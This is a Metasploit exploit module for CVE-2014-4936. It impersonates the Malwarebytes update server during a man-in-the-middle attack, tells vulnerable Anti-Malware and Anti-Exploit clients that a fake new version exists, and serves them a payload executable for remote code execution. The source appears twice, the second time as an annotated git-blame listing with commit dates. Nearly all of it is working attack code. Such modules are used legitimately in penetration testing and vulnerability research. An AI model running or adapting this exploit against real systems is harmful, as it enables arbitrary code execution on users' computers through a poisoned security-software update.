modules/exploits/windows/browser/malwarebytes_update_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking # Would be Great except MBAE doesn't version check

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer

  VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
  EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
  NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in the update functionality of
          Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
          Anti-Exploit consumer 1.03.1.1220.
          Due to the lack of proper update package validation, a man-in-the-middle
          (MITM) attacker could execute arbitrary code by spoofing the update server
          data-cdn.mbamupdates.com and uploading an executable. This module has
          been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Yonathan Klijnsma', # Vulnerability discovery and PoC
          'Gabor Seljan',       # Metasploit module
          'todb'                # Module refactoring
        ],
        'References' => [
          [ 'CVE', '2014-4936' ],
          [ 'OSVDB', '116050' ],
          [ 'URL', 'http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows Universal', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2014-12-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
      ]
    )

    # Vulnerable Malwarebytes clients do not allow altering these.
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  def on_request_uri(cli, request)
    case request.uri
    when VERSION_REGEX
      serve_update_notice(cli) if set_exploit_target($1, request)
    when EXE_REGEX
      serve_exploit(cli)
    else
      vprint_status "Sending empty page for #{request.uri}"
      serve_default_response(cli)
    end
  end

  def serve_default_response(cli)
    send_response(cli, '')
  end

  def check_client_version(request)
    return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/

    this_version = $1
    next_version = NEXT_VERSION[:mbam]
    if Rex::Version.new(next_version) >= Rex::Version.new(this_version)
      return true
    else
      print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
      return false
    end
  end

  def set_exploit_target(package, request)
    case package
    when /mbam/i
      if check_client_version(request)
        @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
      else
        serve_default_response(cli)
        return false
      end
    when /mbae/i
      # We don't get identifying info from MBAE
      @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
    end
  end

  def serve_update_notice(cli)
    software, next_version = @client_software
    print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
    send_response(cli, next_version,
                  'Content-Type' => 'application/octet-stream')
  end

  def serve_exploit(cli)
    print_status "Sending payload EXE..."
    send_response(cli, generate_payload_exe,
                  'Content-Type' => 'application/x-msdos-program')
  end
end
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 12:36:47 -06:00			`Rank = GoodRanking # Would be Great except MBAE doesn't version check`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::Remote::HttpServer`

			`VERSION_REGEX = /\/v2\/(mbam\|mbae)\/consumer\/version.chk/`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`EXE_REGEX = /\/v2\/(mbam\|mbae)\/consumer\/data\/(mbam\|mbae)-setup-(.*)\.exe/`
			`NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',`
			`'Description' => %q{`
			`This module exploits a vulnerability in the update functionality of`
			`Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes`
			`Anti-Exploit consumer 1.03.1.1220.`
			`Due to the lack of proper update package validation, a man-in-the-middle`
			`(MITM) attacker could execute arbitrary code by spoofing the update server`
			`data-cdn.mbamupdates.com and uploading an executable. This module has`
			`been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Yonathan Klijnsma', # Vulnerability discovery and PoC`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`'Gabor Seljan', # Metasploit module`
			`'todb' # Module refactoring`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`[ 'CVE', '2014-4936' ],`
Fix spacing issue 2022-06-10 08:47:41 -05:00			`[ 'OSVDB', '116050' ],`
Adds scripts to find and replace dead module reference links 2025-02-07 12:36:11 +00:00			`[ 'URL', 'http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`'EXITFUNC' => 'process'`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`[ 'Windows Universal', {} ]`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'DisclosureDate' => '2014-12-16',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00
			`register_options(`
			`[`
			`OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),`
			`OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00
			`# Vulnerable Malwarebytes clients do not allow altering these.`
			`deregister_options('SSL', 'SSLVersion', 'SSLCert')`
			`end`

			`def on_request_uri(cli, request)`
			`case request.uri`
			`when VERSION_REGEX`
			`serve_update_notice(cli) if set_exploit_target($1, request)`
			`when EXE_REGEX`
			`serve_exploit(cli)`
			`else`
			`vprint_status "Sending empty page for #{request.uri}"`
			`serve_default_response(cli)`
			`end`
			`end`

			`def serve_default_response(cli)`
			`send_response(cli, '')`
			`end`

			`def check_client_version(request)`
			`return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`this_version = $1`
			`next_version = NEXT_VERSION[:mbam]`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`if Rex::Version.new(next_version) >= Rex::Version.new(this_version)`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`return true`
			`else`
Spelling 2015-02-03 14:10:47 -06:00			`print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`return false`
			`end`
			`end`

			`def set_exploit_target(package, request)`
			`case package`
			`when /mbam/i`
			`if check_client_version(request)`
			`@client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]`
			`else`
			`serve_default_response(cli)`
			`return false`
			`end`
			`when /mbae/i`
			`# We don't get identifying info from MBAE`
			`@client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]`
			`end`
			`end`

			`def serve_update_notice(cli)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`software, next_version = @client_software`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."`
			`send_response(cli, next_version,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Content-Type' => 'application/octet-stream')`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`end`

			`def serve_exploit(cli)`
			`print_status "Sending payload EXE..."`
			`send_response(cli, generate_payload_exe,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Content-Type' => 'application/x-msdos-program')`
Refactor and rename of @sgabe's module 2015-02-03 14:05:11 -06:00			`end`
			`end`